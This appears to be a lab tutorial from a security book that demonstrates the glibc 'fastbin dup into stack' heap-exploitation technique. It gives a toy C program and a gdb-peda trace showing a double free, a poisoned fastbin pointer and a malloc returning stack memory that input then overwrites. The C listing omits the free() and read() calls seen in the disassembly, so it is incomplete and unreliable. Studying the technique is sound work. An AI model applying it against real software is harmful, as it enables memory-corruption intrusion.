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Fastbin dup into stack


#include <stdio.h>
#include <stdlib.h>
int main()
    unsigned long long stack_var[2];
    printf("Stack_var : %p\n",&stack_var);

    char *buf1 = malloc(112);
    char *buf2 = malloc(112);
    char *buf3 = malloc(112);
    unsigned long long *buf4 = malloc(112);
    char *buf5 = malloc(112);
    stack_var[0] = 0x80;
    stack_var[1] = 0;
    *buf4 = (unsigned long long)(((char*)&stack_var) - 8);
    char *buf6 = malloc(112);
    char *buf7 = malloc(112);

lazenca0x0@ubuntu:~/Book/3.fastbin_dup_into_stack$ gcc -o fast_dup_into_stack fast_dup_into_stack.c 
lazenca0x0@ubuntu:~/Book/3.fastbin_dup_into_stack$ gdb -q ./fast_dup_into_stack
Reading symbols from ./fast_dup_into_stack...(no debugging symbols found)...done.
gdb-peda$ disassemble main
Dump of assembler code for function main:
   0x00000000004006a6 <+0>:	push   rbp
   0x00000000004006a7 <+1>:	mov    rbp,rsp
   0x00000000004006aa <+4>:	sub    rsp,0x60
   0x00000000004006ae <+8>:	mov    rax,QWORD PTR fs:0x28
   0x00000000004006b7 <+17>:	mov    QWORD PTR [rbp-0x8],rax
   0x00000000004006bb <+21>:	xor    eax,eax
   0x00000000004006bd <+23>:	mov    rax,QWORD PTR [rip+0x20099c]        # 0x601060 <stderr@@GLIBC_2.2.5>
   0x00000000004006c4 <+30>:	lea    rdx,[rbp-0x20]
   0x00000000004006c8 <+34>:	mov    esi,0x400844
   0x00000000004006cd <+39>:	mov    rdi,rax
   0x00000000004006d0 <+42>:	mov    eax,0x0
   0x00000000004006d5 <+47>:	call   0x400580 <fprintf@plt>
   0x00000000004006da <+52>:	mov    edi,0x70
   0x00000000004006df <+57>:	call   0x400590 <malloc@plt>
   0x00000000004006e4 <+62>:	mov    QWORD PTR [rbp-0x58],rax
   0x00000000004006e8 <+66>:	mov    edi,0x70
   0x00000000004006ed <+71>:	call   0x400590 <malloc@plt>
   0x00000000004006f2 <+76>:	mov    QWORD PTR [rbp-0x50],rax
   0x00000000004006f6 <+80>:	mov    edi,0x70
   0x00000000004006fb <+85>:	call   0x400590 <malloc@plt>
   0x0000000000400700 <+90>:	mov    QWORD PTR [rbp-0x48],rax
   0x0000000000400704 <+94>:	mov    rax,QWORD PTR [rbp-0x58]
   0x0000000000400708 <+98>:	mov    rdi,rax
   0x000000000040070b <+101>:	call   0x400540 <free@plt>
   0x0000000000400710 <+106>:	mov    rax,QWORD PTR [rbp-0x50]
   0x0000000000400714 <+110>:	mov    rdi,rax
   0x0000000000400717 <+113>:	call   0x400540 <free@plt>
   0x000000000040071c <+118>:	mov    rax,QWORD PTR [rbp-0x58]
   0x0000000000400720 <+122>:	mov    rdi,rax
   0x0000000000400723 <+125>:	call   0x400540 <free@plt>
   0x0000000000400728 <+130>:	mov    edi,0x70
   0x000000000040072d <+135>:	call   0x400590 <malloc@plt>
   0x0000000000400732 <+140>:	mov    QWORD PTR [rbp-0x40],rax
   0x0000000000400736 <+144>:	mov    edi,0x70
   0x000000000040073b <+149>:	call   0x400590 <malloc@plt>
   0x0000000000400740 <+154>:	mov    QWORD PTR [rbp-0x38],rax
   0x0000000000400744 <+158>:	mov    QWORD PTR [rbp-0x20],0x80
   0x000000000040074c <+166>:	mov    QWORD PTR [rbp-0x18],0x0
   0x0000000000400754 <+174>:	lea    rax,[rbp-0x20]
   0x0000000000400758 <+178>:	sub    rax,0x8
   0x000000000040075c <+182>:	mov    rdx,rax
   0x000000000040075f <+185>:	mov    rax,QWORD PTR [rbp-0x40]
   0x0000000000400763 <+189>:	mov    QWORD PTR [rax],rdx
   0x0000000000400766 <+192>:	mov    edi,0x70
   0x000000000040076b <+197>:	call   0x400590 <malloc@plt>
   0x0000000000400770 <+202>:	mov    QWORD PTR [rbp-0x30],rax
   0x0000000000400774 <+206>:	mov    edi,0x70
   0x0000000000400779 <+211>:	call   0x400590 <malloc@plt>
   0x000000000040077e <+216>:	mov    QWORD PTR [rbp-0x28],rax
   0x0000000000400782 <+220>:	mov    rax,QWORD PTR [rbp-0x28]
   0x0000000000400786 <+224>:	mov    edx,0x64
   0x000000000040078b <+229>:	mov    rsi,rax
   0x000000000040078e <+232>:	mov    edi,0x0
   0x0000000000400793 <+237>:	call   0x400560 <read@plt>
   0x0000000000400798 <+242>:	mov    eax,0x0
   0x000000000040079d <+247>:	mov    rcx,QWORD PTR [rbp-0x8]
   0x00000000004007a1 <+251>:	xor    rcx,QWORD PTR fs:0x28
   0x00000000004007aa <+260>:	je     0x4007b1 <main+267>
   0x00000000004007ac <+262>:	call   0x400550 <__stack_chk_fail@plt>
   0x00000000004007b1 <+267>:	leave  
   0x00000000004007b2 <+268>:	ret    
End of assembler dump.
gdb-peda$ b *0x0000000000400728
Breakpoint 1 at 0x400728
gdb-peda$ b *0x0000000000400732
Breakpoint 2 at 0x400732
gdb-peda$ b *0x0000000000400740
Breakpoint 3 at 0x400740
gdb-peda$ b *0x0000000000400763
Breakpoint 4 at 0x400763
gdb-peda$ b *0x0000000000400770
Breakpoint 5 at 0x400770
gdb-peda$ b *0x000000000040077e
Breakpoint 6 at 0x40077e
gdb-peda$ b *0x0000000000400793
Breakpoint 7 at 0x400793
gdb-peda$ r
Starting program: /home/lazenca0x0/Book/3.fastbin_dup_into_stack/fast_dup_into_stack 
Stack_var : 0x7fffffffe3f0

Breakpoint 1, 0x0000000000400728 in main ()
gdb-peda$ p main_arena.fastbinsY[6]
$1 = (mfastbinptr) 0x602000
gdb-peda$ x/4gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000081
0x602010:	0x0000000000602080	0x0000000000000000
gdb-peda$ x/4gx 0x0000000000602080
0x602080:	0x0000000000000000	0x0000000000000081
0x602090:	0x0000000000602000	0x0000000000000000
gdb-peda$ x/4gx 0x0000000000602000
0x602000:	0x0000000000000000	0x0000000000000081
0x602010:	0x0000000000602080	0x0000000000000000
gdb-peda$ c
gdb-peda$ c

Breakpoint 2, 0x0000000000400732 in main ()
gdb-peda$ i r rax
rax            0x602010	0x602010
gdb-peda$ p main_arena.fastbinsY[6]
$2 = (mfastbinptr) 0x602080
gdb-peda$ c

Breakpoint 3, 0x0000000000400740 in main ()
gdb-peda$ i r rax
rax            0x602090	0x602090
gdb-peda$ p main_arena.fastbinsY[6]
$3 = (mfastbinptr) 0x602000
gdb-peda$ ni
gdb-peda$ c

0x0000000000400744 in main ()
gdb-peda$ x/2i $rip
=> 0x400744 <main+158>:	mov    QWORD PTR [rbp-0x20],0x80
   0x40074c <main+166>:	mov    QWORD PTR [rbp-0x18],0x0
gdb-peda$ i r rbp
rbp            0x7fffffffe410	0x7fffffffe410
gdb-peda$ p/x 0x7fffffffe410 - 0x20
$4 = 0x7fffffffe3f0
gdb-peda$ p/x 0x7fffffffe410 - 0x18
$5 = 0x7fffffffe3f8
gdb-peda$ ni

0x000000000040074c in main ()
gdb-peda$ ni

0x0000000000400754 in main ()
gdb-peda$ x/2gx 0x7fffffffe3f0
0x7fffffffe3f0:	0x0000000000000080	0x0000000000000000
gdb-peda$ c
gdb-peda$ c

Breakpoint 4, 0x0000000000400763 in main ()
gdb-peda$ x/i $rip
=> 0x400763 <main+189>:	mov    QWORD PTR [rax],rdx
gdb-peda$ i r rax
rax            0x602010	0x602010
gdb-peda$ i r rdx
rdx            0x7fffffffe3e8	0x7fffffffe3e8
gdb-peda$ ni

0x0000000000400766 in main ()
gdb-peda$ p main_arena.fastbinsY[6]
$6 = (mfastbinptr) 0x602000
gdb-peda$ x/4gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000081
0x602010:	0x00007fffffffe3e8	0x0000000000000000
gdb-peda$ x/4gx 0x00007fffffffe3e8
0x7fffffffe3e8:	0x0000000000000000	0x0000000000000080
0x7fffffffe3f8:	0x0000000000000000	0x00007fffffffe4f0
gdb-peda$ c

Breakpoint 5, 0x0000000000400770 in main ()
gdb-peda$ i r rax
rax            0x602010	0x602010
gdb-peda$ c

Breakpoint 6, 0x000000000040077e in main ()
gdb-peda$ i r rax
rax            0x7fffffffe3f8	0x7fffffffe3f8
gdb-peda$ x/4gx 0x7fffffffe3f8
0x7fffffffe3f8:	0x0000000000000000	0x00007fffffffe4f0
0x7fffffffe408:	0xf57229810c117d00	0x00000000004007c0
gdb-peda$ c

Breakpoint 7, 0x0000000000400793 in main ()
gdb-peda$ x/i $rip
=> 0x400793 <main+237>:	call   0x400560 <read@plt>
gdb-peda$ i r rsi
rsi            0x7fffffffe3f8	0x7fffffffe3f8
gdb-peda$ ni

0x0000000000400798 in main ()
gdb-peda$ x/4gx 0x7fffffffe3f8
0x7fffffffe3f8:	0x4141414141414141	0x4242424242424242
0x7fffffffe408:	0x4343434343434343	0x4444444444444444

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